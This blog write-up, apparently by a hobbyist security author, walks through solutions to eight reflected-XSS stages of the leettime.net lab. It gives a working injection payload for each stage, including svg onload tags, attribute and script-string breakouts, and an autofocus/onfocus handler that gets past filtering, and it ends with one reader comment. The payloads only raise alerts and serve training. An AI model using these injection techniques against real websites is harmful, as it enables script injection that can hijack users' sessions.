Web Applications Hacking XSS

leettime.net XSS challenge solution

Hows it going bros? Today we are gonna play the XSS challenge by leettime.net.
It consists of 8 different challenges where need to pop-up the URL of the webpage by doing alert(document.URL). The layout of challenge page stays the same throughout the challenge

leettime.net xss challenge

We will be using d3v as the basic probe throughout the challenge. So without wasting any more time, lets go!

Challenge 1

Lets enter d3v in the search box and observe the source code

<center>cannot find d3v</center>

So the input is landing in HTML context. In the this case, we can just do this:

<svg onload=alert(URL)>

Lets see if works or not.xss challenge 1

It does! Hey wait, I don’t think it would be a good idea to add this image after every solution, so we will skip it.

Challenge 2

In the next challenge, the input gets reflected as follow:

<input type="text" name="name" value=d3v></input>

So it got reflected as a value of an attribute without any quotes around it. The simplest way to break out of this will be using a > to close the current tag and the complete payload will be:

><svg onload=alert(URL)>

Done!

Challenge 3

This is similar to the previous one, the only difference is that this time the value is within double quotes

<input type="text" name="name" value="d3v">

To close the value and break out of the tag, we will use “> and the complete payload will be:

"><svg onload=alert(URL)>

Challenge 4

Okay this is getting boring now. This time the value is within single quotes and hence the payload will be:

'><svg onload=alert(URL)>

Challenge 5

Phewww! Finally something different. This time its landing as a variable value inside a script block as follows:

<script>var search_str="d3v";</script>

In this case we will be using the following payload:

";alert(document.URL);"

Lets break it down to understand how it works

  • declares the end of the value
  • In JavaScript, each line of the code must be ended by a semicolon (;) so we ending the variable line by adding a ;
  • The previous line has ended and we are free to add our own code so lets inject alert(document.URL). Wait what? Why document.URL and not just URL like previous cases? Because this time we are in a script block and to access the DOM we must use the document property.
  • ; will end the line
  • will be paired with the another in source to keep the syntax valid

On putting it together, it looks like this:

<script>var search_str="";alert(document.URL);"";</script>

It looks beautiful, doesn’t it?

Challenge 6

Oh boy! This is not how you create challenges. This challenge is same as the previous one, the only difference is that this time the variable value is contained within single quotes (‘) and hence the payload will be:

';alert(document.URL);'

Challenge 7

Here’s the reflection

<input type="text" name="name" value='d3v'></input>

We have done this before, lets close the value and the tag by adding ‘> and the payload will be

'><svg onload=alert(URL)>

Oopps! It didn’t work!
Lets take a look at the source code for clues

<input type="text" name="name" value=''<svg onload=alert(URL)'></input>

Hmmm so the > is getting filtered so we can’t break out of the tag but we can break out of the value and try injecting an event handler. We will use the following payload:

'autofocus onfocus='alert(URL)

It works and before we break it down, lets see how it gets reflected

<input type="text" name="name" value=''autofocus onfocus='alert(URL)'></input>

Now lets break it down

  • declares the end of the value
  • autofocus is used to automatically focus on an element
  • onfocus is an event handler which gets triggered when we focus on an element containing onfocus
  • the declares the start of the value of onfocus

Challenge 8

Here’s the reflection

<input type="text" name="name" value='d3v'></input>

Yes I know its as same as the previous one but in this one single quotes (‘) are getting filtered and hence we can’t break out of it.
So whats the catch? Well the resulting URL after the search is

http://leettime.net/xsslab1/stage--08.php?name=d3v&submit=search

So the thing is that the value of the submit parameter is also getting reflected. The reflection is

<input type="text" name="name" value='d3v'></input>
<input type="submit" name="submit" value="search">

So lets inject our payload in the submit parameter and the payload we are going to inject will be

"autofocus onfocus="alert(URL)

annnnddd that’s it! We completed the challengeleettime.net xss challenge

Also Read: Solution of Google’s XSS Challenge [Explained]

About the author

D3V

I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

2 Comments

Click here to post a comment

  • hello,

    in challenge 8 it’s filtered out the ” symbol.
    and in source code it’s showing : value=’"autofocus onfocus="alert(document.URL)’>

    how to resolve it.

Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.

Categories